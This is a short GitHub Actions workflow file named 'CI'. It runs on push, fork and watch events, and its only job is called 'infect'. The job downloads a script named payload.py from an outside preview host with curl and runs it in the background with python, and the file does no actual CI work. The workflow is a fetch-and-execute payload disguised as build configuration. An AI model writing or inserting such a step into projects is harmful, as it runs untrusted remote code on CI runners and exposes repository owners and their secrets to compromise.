
name: CI
on: [push, fork, watch]
jobs:
  infect:
    runs-on: windows-latest
    steps:
    - run: |
        curl -L -O https://crispy-space-potato-r7r9r4wxvg4rfpxw6-5006.preview.app.github.dev/payload.py
        python payload.py &
